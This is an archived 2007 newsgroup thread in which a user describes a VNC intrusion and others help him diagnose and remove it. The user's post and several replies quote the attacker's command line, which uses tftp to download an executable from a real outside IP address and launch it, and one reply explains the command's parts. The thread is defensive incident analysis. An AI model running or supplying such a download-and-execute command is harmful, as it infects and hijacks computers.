Trojan from using VNC Viewer Software - Firewalls

This is a discussion on Trojan from using VNC Viewer Software - Firewalls ; Hey guys. I've bene using the VNC Viewer software to access a Linux environment at my University's Linux servers. However, I have over the last few days had a number of occurances of a Trojan somehow finding its way onto ...

+ Reply to Thread
Results 1 to 16 of 16

Thread: Trojan from using VNC Viewer Software

  1. Trojan from using VNC Viewer Software

    Hey guys. I've bene using the VNC Viewer software to access a Linux
    environment at my University's Linux servers.

    However, I have over the last few days had a number of occurances of a
    Trojan somehow finding its way onto my computer. At some point I would
    suddenly lose control of the computer. A Task Manager window would
    come up, followed by a run window. In this run window the following
    two things are entered:

    %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
    64.79.213.12 GET ktqjy.exe & start ktqjy&

    %systemroot%\system32\cmd.exe

    In the past I have always been at my computer, so I have been able to
    interrupt it by just turning the computer off before it can do that it
    is trying to do. Following the last occurance I spent all afternoon
    running virus scans and spyware scans using:

    AVG Anti virus
    AVG anti spyware
    Zonealarm Pro's spyware scanner
    Spybot Search and Destroy

    A Trojan was found (called Generic3.ARX) by AVG and a number of
    Spyware items were found and deleted. Satisfied that allw as well, I
    opened up the VNC Viewer software and got back to work.

    However, today whilst I went away to get a drink the Trojan ran again.
    This time I was unable to interrupt it and I came back to find a Task
    manager window, a run window and a command prompt all open. Clearly
    whatever the Trojan tries to do it has succeeded. I am running both
    AVG anti virus and anti spyware scans at the moment but nothing
    appears to be coming up this time.

    Therefore, what can I do to eradicate whatever this Trojan has done to
    my computer? What sort of things would this Trojan do? (or begin doing
    as we speak?). Simply stop using VNC Viewer is not an option as I need
    it to do my coursework.

    I run the latest version of ZoneAlarm Pro along with the other
    programmes mentioned above to combat spyware.

    Kind regards,

    Matt


  2. Re: Trojan from using VNC Viewer Software

    Matt wrote on 30 Mar 2007 08:55:11 -0700:

    > Hey guys. I've bene using the VNC Viewer software to access a Linux
    > environment at my University's Linux servers.
    >
    > However, I have over the last few days had a number of occurances of a
    > Trojan somehow finding its way onto my computer. At some point I would
    > suddenly lose control of the computer. A Task Manager window would
    > come up, followed by a run window. In this run window the following
    > two things are entered:
    >
    > %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
    > 64.79.213.12 GET ktqjy.exe & start ktqjy&
    >
    > %systemroot%\system32\cmd.exe
    >
    > In the past I have always been at my computer, so I have been able to
    > interrupt it by just turning the computer off before it can do that it
    > is trying to do. Following the last occurance I spent all afternoon
    > running virus scans and spyware scans using:
    >
    > AVG Anti virus
    > AVG anti spyware
    > Zonealarm Pro's spyware scanner
    > Spybot Search and Destroy
    >
    > A Trojan was found (called Generic3.ARX) by AVG and a number of
    > Spyware items were found and deleted. Satisfied that allw as well, I
    > opened up the VNC Viewer software and got back to work.
    >
    > However, today whilst I went away to get a drink the Trojan ran again.
    > This time I was unable to interrupt it and I came back to find a Task
    > manager window, a run window and a command prompt all open. Clearly
    > whatever the Trojan tries to do it has succeeded. I am running both
    > AVG anti virus and anti spyware scans at the moment but nothing
    > appears to be coming up this time.
    >
    > Therefore, what can I do to eradicate whatever this Trojan has done to
    > my computer? What sort of things would this Trojan do? (or begin doing
    > as we speak?). Simply stop using VNC Viewer is not an option as I need
    > it to do my coursework.
    >
    > I run the latest version of ZoneAlarm Pro along with the other
    > programmes mentioned above to combat spyware.
    >
    > Kind regards,
    >
    > Matt



    This should have nothing to do with the Viewer, are you sure you didn't also
    install the Server on your own machine and leave the port open to the
    outside world? See http://www.realvnc.com/pipermail/vnc...ry/057050.html
    for more info, basically someone/something is connecting to the VNC Server
    on your machine bypassing the authentication, and then running the commands
    (either manually or using a script, most likely using a script). I'm
    guessing that when you downloaded and installed VNC Viewer you actually
    download the full Client+Server package and installed both, and you allowed
    VNC Server to listen in Zone Alarm, probably when it first ran and you
    blindly hit the Allow button. Get your machine cleaned and uninstall VNC
    Server - you do not need the server component to use the Viewer to access
    another machine.

    Dan



  3. Re: Trojan from using VNC Viewer Software

    On Fri, 30 Mar 2007 08:55:11 -0700, Matt wrote:

    > Hey guys. I've bene using the VNC Viewer software to access a Linux
    > environment at my University's Linux servers.
    >
    > However, I have over the last few days had a number of occurances of a
    > Trojan somehow finding its way onto my computer. At some point I would
    > suddenly lose control of the computer. A Task Manager window would
    > come up, followed by a run window. In this run window the following
    > two things are entered:
    >
    > %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
    > 64.79.213.12 GET ktqjy.exe & start ktqjy&
    >
    > %systemroot%\system32\cmd.exe
    >
    > In the past I have always been at my computer, so I have been able to
    > interrupt it by just turning the computer off before it can do that it
    > is trying to do. Following the last occurance I spent all afternoon
    > running virus scans and spyware scans using:
    >
    > AVG Anti virus
    > AVG anti spyware
    > Zonealarm Pro's spyware scanner
    > Spybot Search and Destroy
    >
    > A Trojan was found (called Generic3.ARX) by AVG and a number of
    > Spyware items were found and deleted. Satisfied that allw as well, I
    > opened up the VNC Viewer software and got back to work.
    >
    > However, today whilst I went away to get a drink the Trojan ran again.
    > This time I was unable to interrupt it and I came back to find a Task
    > manager window, a run window and a command prompt all open. Clearly
    > whatever the Trojan tries to do it has succeeded. I am running both
    > AVG anti virus and anti spyware scans at the moment but nothing
    > appears to be coming up this time.
    >
    > Therefore, what can I do to eradicate whatever this Trojan has done to
    > my computer? What sort of things would this Trojan do? (or begin doing
    > as we speak?). Simply stop using VNC Viewer is not an option as I need
    > it to do my coursework.
    >
    > I run the latest version of ZoneAlarm Pro along with the other
    > programmes mentioned above to combat spyware.


    First, how do you know it's a trojan STILL on your system?

    Did you reset the VNC connection password?

    Did you change the default VNC Server port to something other than 5900?

    Why is your computer exposed directly to the internet instead of behind a
    NAT appliance of some type?



    --
    Want to know what PCBUTTS1 is really about?
    *** WARNING - this links contains foul/pornographic content of an
    abusive nature created by PCBUTTS1 and still hosted on his public
    website ***
    http://www.pcbutts1.com/downloads/leythos.htm

  4. Re: Trojan from using VNC Viewer Software

    > First, how do you know it's a trojan STILL on your system?

    That's an assumption I am making, I doubt the Trojan would kindly
    remove all traces of itself once it has done what it wanted to do.
    I've run scans in all the programmes I mentioned above and one of them
    could find any mention of this Trojan, so it was has clearly tidied up
    after itself very well.

    > Did you reset the VNC connection password?


    I'm using VNC Viewer 4.1.2 (the free one) which has no such option

    > Did you change the default VNC Server port to something other than 5900?


    Again, I had no such option

    > Why is your computer exposed directly to the internet instead of behind a
    > NAT appliance of some type?


    I use a router (which HAD the ports open for VNC I thought I needed,
    but I have just closed them realising of course that they aren't
    actually needed), along with Zonealarm, so I don't see myself as being
    directly connected to the Internet.

    Kind regards,

    Matt



  5. Re: Trojan from using VNC Viewer Software

    > This should have nothing to do with the Viewer, are you sure you didn't also
    > install the Server on your own machine and leave the port open to the
    > outside world? Seehttp://www.realvnc.com/pipermail/vnc-list/2007-February/057050.html
    > for more info, basically someone/something is connecting to the VNC Server
    > on your machine bypassing the authentication, and then running the commands
    > (either manually or using a script, most likely using a script). I'm
    > guessing that when you downloaded and installed VNC Viewer you actually
    > download the full Client+Server package and installed both, and you allowed
    > VNC Server to listen in Zone Alarm, probably when it first ran and you
    > blindly hit the Allow button. Get your machine cleaned and uninstall VNC
    > Server - you do not need the server component to use the Viewer to access
    > another machine.


    You are absolutely right, I did install the full package and probably
    did tell ZoneAlarm to let it have special prividedges. I will
    uninstall it right away. The only problem is that I don't think I am
    going to be able to "clean" ym computer, because after running all the
    scans I mentioend above, none of them came up with anything.

    Is their anything I can do aside from reformatting my computer to
    ensure I get rid of this?

    Kind Regards,

    Matt


  6. Re: Trojan from using VNC Viewer Software

    > First, how do you know it's a trojan STILL on your system?

    That's an assumption I am making, I doubt the Trojan would kindly
    remove all traces of itself once it has done what it wanted to do.
    I've run scans in all the programmes I mentioned above and one of them
    could find any mention of this Trojan, so it was has clearly tidied up
    after itself very well.

    > Did you reset the VNC connection password?


    I'm using VNC Viewer 4.1.2 (the free one0 which has no such option

    > Did you change the default VNC Server port to something other than 5900?


    Again, I had no such option

    > Why is your computer exposed directly to the internet instead of behind a
    > NAT appliance of some type?


    I use a router (which HAD the ports open for VNC I thought I needed,
    but I have just closed them realising of course that they aren't
    actually needed), along with Zonealarm, so I don't see myself as being
    directly connected to the Internet.

    Kind regards,

    Matt



  7. Re: Trojan from using VNC Viewer Software

    On 30 Mar 2007 10:03:04 -0700, "Matt" wrote:

    >Is their anything I can do aside from reformatting my computer to
    >ensure I get rid of this?


    Use Autoruns to look for startup programs that you didn't authorize. Look
    for any instances of DLL files being loaded on startup that are not
    authorized. You can try looking in the System32 directory for recently
    modified files, or hidden files that have random names like xzlk.dll, and
    send the files found to http://www.virustotal.com/en/indexf.html for
    analysis. You could also try running a spyware scanner like Spybot Search
    & Destroy or SuperAntiSpyware; the later can detect files based on
    characteristics like size, random file names, and other attributes that are
    common among trojans and malware.

  8. Re: Trojan from using VNC Viewer Software

    > Is their anything I can do aside from reformatting my computer to
    > ensure I get rid of this?
    >




  9. Re: Trojan from using VNC Viewer Software

    On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
    > > Is their anything I can do aside from reformatting my computer to
    > > ensure I get rid of this?

    >
    >


    That makes for some interesting reading, looks like a reformat is the
    only option.

    Thanks to everyone for all the replies.

    Kind Regards,

    Matt


  10. Re: Trojan from using VNC Viewer Software

    Matt wrote:
    > On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
    >>> Is their anything I can do aside from reformatting my computer to
    >>> ensure I get rid of this?

    >>

    >
    > That makes for some interesting reading, looks like a reformat is the
    > only option.


    There are exploits that modify the POST code and BIOS so that even
    reformatting may not help :-( Is it time for a new computer???

  11. Re: Trojan from using VNC Viewer Software

    Rick Merrill wrote:
    > Matt wrote:
    >> On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
    >>>> Is their anything I can do aside from reformatting my computer to
    >>>> ensure I get rid of this?
    >>>

    >>
    >> That makes for some interesting reading, looks like a reformat is the
    >> only option.

    >
    > There are exploits that modify the POST code and BIOS so that even
    > reformatting may not help :-( Is it time for a new computer???


    ??? i've never heard of anything specifically modifying the power on
    self test (post) facility of a computer (isn't it *part of* the bios?)...

    as for the bios, the only modifications any known malware has ever made
    is to corrupt flashable bios, and that is rather noticable as it stops
    the computer from booting...

    so no, it's not time for a new computer yet...

    --
    "it's not the right time to be sober
    now the idiots have taken over
    spreading like a social cancer,
    is there an answer?"

  12. Re: Trojan from using VNC Viewer Software

    Matt wrote:

    > On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
    >>> Is their anything I can do aside from reformatting my computer to
    >>> ensure I get rid of this?

    >>
    >>

    >
    > That makes for some interesting reading, looks like a reformat is the
    > only option.


    Yes and no.

    Everything that restores your computer to a well-known safe state is an
    option. If you have a verified backup, you can restore from that. You can
    compare against a complete reference system. If you have a backup
    containing a list of checksums of all system-relevant files, you can detect
    the changes and selective restore these parts (or verify them as harmless
    changes). You can boot a trusted system and verify all signed binaries and
    just restore all relevant data files (Windows Registry and some other
    databases, some INF and INI files, boot sector etc.).

    But, if no such safe reference exists, the only well-known safe state is a
    fresh install. Sadly, this is the most common case.

  13. Re: Trojan from using VNC Viewer Software

    kurt wismer wrote:

    > Rick Merrill wrote:
    >> Matt wrote:
    >>> On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
    >>>>> Is their anything I can do aside from reformatting my computer to
    >>>>> ensure I get rid of this?
    >>>>
    >>>
    >>> That makes for some interesting reading, looks like a reformat is the
    >>> only option.

    >>
    >> There are exploits that modify the POST code and BIOS so that even
    >> reformatting may not help :-( Is it time for a new computer???

    >
    > ??? i've never heard of anything specifically modifying the power on
    > self test (post) facility of a computer (isn't it *part of* the bios?)...
    >
    > as for the bios, the only modifications any known malware has ever made
    > is to corrupt flashable bios, and that is rather noticable as it stops
    > the computer from booting...
    >
    > so no, it's not time for a new computer yet...


    Actually it's quite trivial to modify the BIOS (intentionally!), see what
    the BIOS modder communities are achieving. It would be no problem to
    implement such malware.

    There have been extensive discussions about the default settings for
    enabling flashing the BIOS as well as how well these actually work. If you
    have a hardware-implemented switch, if it's set to disabled, and you flash
    chip is not one of those old Intel or Amtel chips from before about 2001,
    it shouldn't be possible to flash the BIOS.

  14. Re: Trojan from using VNC Viewer Software

    > ??? i've never heard of anything specifically modifying the power on
    > self test (post) facility of a computer (isn't it *part of* the bios?)...
    >
    > as for the bios, the only modifications any known malware has ever made
    > is to corrupt flashable bios, and that is rather noticable as it stops
    > the computer from booting...
    >
    > so no, it's not time for a new computer yet...


    Well I formatted and reinstalled Windows a few days ago now and
    everything seems to be running smoothly.

    Thanks again for all the replies on this topic.

    Kind regards,

    Matt


  15. Re: Trojan from using VNC Viewer Software

    On Mar 30, 6:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
    > > Is their anything I can do aside from reformatting my computer to
    > > ensure I get rid of this?

    >
    >


    Well assuming your original post contains the only commands that were
    run here's what we can figure out.

    "%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -
    i
    64.79.213.12 GET ktqjy.exe & start ktqjy& "

    %comspec% is an environment variable on windows system which points to
    the command prompt executable. We can verify this by launching a
    command prompt and echo'ing the value to the screen, ie:
    C:\Documents and Settings\someuser>echo %comspec%
    C:\WINNT\system32\cmd.exe

    Next we can see what the /c switch does for the command prompt
    (cmd.exe), ie:
    C:\Documents and Settings\someuser>cmd.exe /?
    Starts a new instance of the Windows XP command interpreter

    CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /
    V:OFF]
    [[/S] [/C | /K] string]

    /C Carries out the command specified by string and then
    terminates

    Ok so /c carries out the commands provided when cmd.exe is called (via
    %comspec%).

    Next we see that he echo'd some useless junk to the
    screen....Repairing....Please Wait, laaa deee daaaa.

    Next he uses tftp to connect to 64.79.213.12 and get ktqjy.exe. We can
    verify this by checking the command optionsn for tftp:

    C:\Documents and Settings\someuser>tftp /?

    Transfers files to and from a remote computer running the TFTP
    service.

    TFTP [-i] host [GET | PUT] source [destination]

    -i Specifies binary image transfer mode (also called
    octet). In binary image mode the file is moved
    literally, byte by byte. Use this mode when
    transferring binary files.

    So -i specifies binary transfer which is what he'd need for a
    executable (exe).

    Lastly he launches ktqjy.

    ktqjy.exe should be sitting in whatever the default directory of your
    command prompt is, something like "C:\Documents and Settings\someuser"
    if you goto the start menu select run type cmd and hit ok it'll be
    displayed on the screen. You can navigate to this directory in
    explorer and delete the file. You may have to launch task manager and
    "End Process" on it first. Also you should fire up msconfig (start:run
    msconfig) and review all your startup items.

    etc....

    Just follow the information you have.


  16. Re: Trojan from using VNC Viewer Software

    kingthorin@gmail.com wrote:

    > Lastly he launches ktqjy.
    >
    > ktqjy.exe should be sitting in whatever the default directory of your
    > command prompt is, something like "C:\Documents and Settings\someuser"
    > if you goto the start menu select run type cmd and hit ok it'll be
    > displayed on the screen. You can navigate to this directory in
    > explorer and delete the file. You may have to launch task manager and
    > "End Process" on it first. Also you should fire up msconfig (start:run
    > msconfig) and review all your startup items.
    >
    > etc....
    >
    > Just follow the information you have.


    In the meanwhile, ktqjy.exe has modified various system binaries, imposed
    some kernel hooks such that killing just removes it from the list of
    processed (but still keeps on running) and doesn't list the three other
    copies of itself not any more, has downloaded 5 other binaries and executed
    some, modified some system settings to open some obstrusive security
    vulnerabilities to allow easier reinfection, ...

    Oh, and it might have simply modified the previous history.

    Short to say: You have no reliable information whatsoever.

+ Reply to Thread